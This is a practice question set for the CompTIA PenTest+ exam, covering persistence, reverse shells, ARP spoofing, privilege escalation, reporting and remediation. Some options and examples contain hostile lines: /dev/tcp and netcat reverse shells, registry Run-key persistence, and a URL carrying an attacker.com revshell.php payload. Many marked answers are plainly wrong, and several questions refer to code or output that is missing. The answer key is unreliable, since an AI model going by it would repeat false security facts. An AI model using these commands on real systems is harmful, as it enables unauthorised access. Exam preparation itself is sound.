CompTIA PenTest+ Certified for Cybersecurity Professionals Set 2

Which of the following BEST describes some significant security weaknesses with an ICS, such as those used in electrical utility facilities, natural gas facilities, dams, and nuclear facilities?


Options are :

  • ICS vendors are slow to implement adequate security controls.
  • ICS staff are not adequately trained to perform basic duties. (Correct)
  • There is a scarcity of replacement equipment for critical devices.
  • There is a lack of compliance for ICS facilities.

Answer : ICS staff are not adequately trained to perform basic duties.

A penetration tester has gained access to a marketing employee's device. The penetration tester wants to ensure that if the access is discovered, control of the device can be regained. Which of the following actions should the penetration tester use to maintain persistence to the device? (Select TWO.)


Options are :

  • Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1. (Correct)
  • Place an entry in C:\windows\system32\drivers\etc\hosts for 12.17.20.10 badcomptia.com.
  • Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1. (Correct)
  • Create a fake service in Windows called RTAudio to execute manually.
  • Place an entry for RTAudio in HKLM\CurrentControlSet\Services\RTAudio.
  • Create a schedule task to call C:\windows\system32\drivers\etc\hosts.

Answer : Place an entry in HKLM\Software\Microsoft\CurrentVersion\Run to call au57d.ps1. Place a script in C:\users\%username\local\appdata\roaming\temp\au57d.ps1.

Which of the following tools is used to perform a credential brute force attack?


Options are :

  • Hydra (Correct)
  • John the Ripper
  • Hashcat
  • Peach

Answer : Hydra

A penetration tester has performed a security assessment for a startup firm. The report lists a total of ten vulnerabilities, with five identified as critical. The client does not have the resources to immediately remediate all vulnerabilities. Under such circumstances, which of the following would be the BEST suggestion for the client?


Options are :

  • Apply easy compensating controls for critical vulnerabilities to minimize the risk, and then reprioritize remediation.
  • Identify the issues that can be remediated most quickly and address them first.
  • Implement the least impactful of the critical vulnerabilities' remediations first, and then address other critical vulnerabilities
  • Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime. (Correct)

Answer : Fix the most critical vulnerability first, even if it means fixing the other vulnerabilities may take a very long lime.

Which of the following is the reason why a penetration tester would run the chkconfig --del servicename command at the end of an engagement?


Options are :

  • To remove the persistence (Correct)
  • To enable persistence
  • To report persistence
  • To check for persistence

Answer : To remove the persistence

A penetration tester is performing ARP spoofing against a switch. Which of the following should the penetration tester spoof to get the MOST information?


Options are :

  • MAC address of the client
  • MAC address of the domain controller
  • MAC address of the web server
  • MAC address of the gateway (Correct)

Answer : MAC address of the gateway

Which of the following is an example of a spear phishing attack?


Options are :

  • Targeting an executive with an SMS attack (Correct)
  • Targeting a specific team with an email attack
  • Targeting random users with a USB key drop
  • Targeting an organization with a watering hole attack

Answer : Targeting an executive with an SMS attack

A security assessor is attempting to craft specialized XML files to test the security of the parsing functions during ingest into a Windows application. Before beginning to test the application, which of the following should the assessor request from the organization?


Options are :

  • Sample SOAP messages
  • The REST API documentation
  • A protocol fuzzing utility
  • An applicable XSD file (Correct)

Answer : An applicable XSD file

Which of the following CPU registers does the penetration tester need to overwrite in order to exploit a simple buffer overflow?


Options are :

  • Stack pointer register (Correct)
  • Index pointer register
  • Stack base pointer
  • Destination index register

Answer : Stack pointer register

Which of the following commands starts the Metasploit database?


Options are :

  • msfconsole (Correct)
  • workspace
  • msfvenom
  • db_init
  • db_connect

Answer : msfconsole

A company requested a penetration tester review the security of an in-house developed Android application. The penetration tester received an APK file to support the assessment. The penetration tester wants to run SAST on the APK file. Which of the following preparatory steps must the penetration tester do FIRST? (Select TWO).


Options are :

  • Convert to JAR. (Correct)
  • Decompile. (Correct)
  • Cross-compile the application.
  • Convert JAR files to DEX.
  • Re-sign the APK.
  • Attach to ADB.

Answer : Convert to JAR. Decompile.

A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this?


Options are :

  • Appendices
  • Executive summary (Correct)
  • Technical summary
  • Main body

Answer : Executive summary

A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output:

Which of the following is the tester intending to do?


Options are :

  • Horizontally escalate privileges.
  • Scrape the page for hidden fields.
  • Analyze HTTP response code.
  • Search for HTTP headers. (Correct)

Answer : Search for HTTP headers.

A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task?


Options are :

  • From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal (Correct)
  • From the local computer, run the following command: ssh -L4444:127.0.0.1:6000 -X user@10.0.0.20 xterm
  • From the remote computer, run the following command: ssh -R6000:127.0.0.1:4444 -p 6000 user@192.168.1.10 xhost+; xterm
  • From the local computer, run the following command: nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192.168.1.10 6000

Answer : From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal

A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy:

Which of the following types of vulnerabilities is being exploited?


Options are :

  • Forced browsing vulnerability
  • Parameter pollution vulnerability
  • File upload vulnerability
  • Cookie enumeration (Correct)

Answer : Cookie enumeration

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?


Options are :

  • perl -e 'use SOCKET'; $i='; $p='443;
  • ssh superadmin@ -p 443
  • nc -e /bin/sh 443
  • bash -i >& /dev/tcp//443 0>&1 (Correct)

Answer : bash -i >& /dev/tcp//443 0>&1

A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?


Options are :

  • Command injection attack
  • Clickjacking attack (Correct)
  • Directory traversal attack
  • Remote file inclusion attack

Answer : Clickjacking attack

During testing, a critical vulnerability is discovered on a client's core server. Which of the following should be the NEXT action?


Options are :

  • Disable the network port of the affected service. (Correct)
  • Complete all findings, and then submit them to the client.
  • Promptly alert the client with details of the finding.
  • Take the target offline so it cannot be exploited by an attacker.

Answer : Disable the network port of the affected service.

After gaining initial low-privilege access to a Linux system, a penetration tester identifies an interesting binary in a user's home folder titled changepass.


-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepass


Using strings" to print ASCII printable characters from changepass, the tester notes the following:


$ strings changepass


exit


setuid


strcmp


GLIBC_2.0


ENV_PATH


%s/changepw


malloc


strlen


Given this information, which of the following is the MOST likely path of exploitation to achieve root privileges on the machine?


Options are :

  • Copy changepass to a writable directory and export the ENV_PATH environmental variable to the path of a token-stealing binary titled changepw. Then run changepass.
  • Create a copy of changepass in the same directory, naming it changepw. Export the ENV_PATH environmental variable to the path '/home/user/'. Then run changepass.
  • Export the ENV_PATH environmental variable to the path of a writable directory that contains a token-stealing binary titled changepw. Then run changepass.
  • Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'. (Correct)

Answer : Run changepass within the current directory with sudo after exporting the ENV_PATH environmental variable to the path of '/usr/local/bin'.

A penetration tester wants to script out a way to discover all the RPTR records for a range of IP addresses. Which of the following is the MOST efficient to utilize?


Options are :

  • nmap -p 53 -oG dnslist.txt | cut -d : -f 4 (Correct)
  • nslookup -ns 8.8.8.8 << dnslist.txt
  • for x in {1...254}; do dig -x 192.168.$x.$x; done
  • dig -r > echo 8.8.8.8 >> /etc/resolv.conf

Answer : nmap -p 53 -oG dnslist.txt | cut -d : -f 4

Given the following Python script:

Which of the following is where the output will go?


Options are :

  • To the screen
  • To a network server
  • To a file (Correct)
  • To /dev/null

Answer : To a file

While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:


https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php


Which of the following remediation steps should be taken to prevent this type of attack?


Options are :

  • Implement a blacklist.
  • Block URL redirections. (Correct)
  • Double URL encode the parameters.
  • Stop external calls from the application.

Answer : Block URL redirections.

A penetration tester is performing a remote scan to determine if the server farm is compliant with the company's software baseline. Which of the following should the penetration tester perform to verify compliance with the baseline?


Options are :

  • Discovery scan (Correct)
  • Stealth scan
  • Full scan
  • Credentialed scan

Answer : Discovery scan

A penetration tester is reviewing the following output from a wireless sniffer:

Which of the following can be extrapolated from the above information?


Options are :

  • Hardware vendor
  • Channel interference
  • Usernames (Correct)
  • Key strength

Answer : Usernames

A penetration tester reports an application is only utilizing basic authentication on an Internet-facing application. Which of the following would be the BEST remediation strategy?


Options are :

  • Enable HTTP Strict Transport Security. (Correct)
  • Enable a secure cookie flag.
  • Encrypt the communication channel.
  • Sanitize invalid user input.

Answer : Enable HTTP Strict Transport Security.

Which of the following excerpts would come from a corporate policy?


Options are :

  • Employee passwords must contain a minimum of eight characters, with one being alphanumeric.
  • The help desk can be reached at 800-passwd1 to perform password resets.
  • Employees must use strong passwords for accessing corporate assets.
  • The corporate systems must store passwords using the MD5 hashing algorithm. (Correct)

Answer : The corporate systems must store passwords using the MD5 hashing algorithm.

While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?


Options are :

  • HKEY_CLASSES_ROOT
  • HKEY_LOCAL_MACHINE
  • HKEY_CURRENT_USER (Correct)
  • HKEY_CURRENT_CONFIG

Answer : HKEY_CURRENT_USER

A penetration tester has a full shell to a domain controller and wants to discover any user account that has not authenticated to the domain in 21 days. Which of the following commands would BEST accomplish this?


Options are :

  • dsrm -users DN=company.com; OU=hq CN=users
  • dsuser -name -account -limit 3
  • dsquery user -inactive 3
  • dsquery -o -rdn -limit 21 (Correct)

Answer : dsquery -o -rdn -limit 21

Which of the following properties of the penetration testing engagement agreement will have the LARGEST impact on observing and testing production systems at their highest loads?


Options are :

  • Creating a scope of the critical production systems
  • Setting a schedule of testing access times (Correct)
  • Establishing a white-box testing engagement
  • Having management sign off on intrusive testing

Answer : Setting a schedule of testing access times

Comment / Suggestion Section
Point our Mistakes and Post Your Suggestions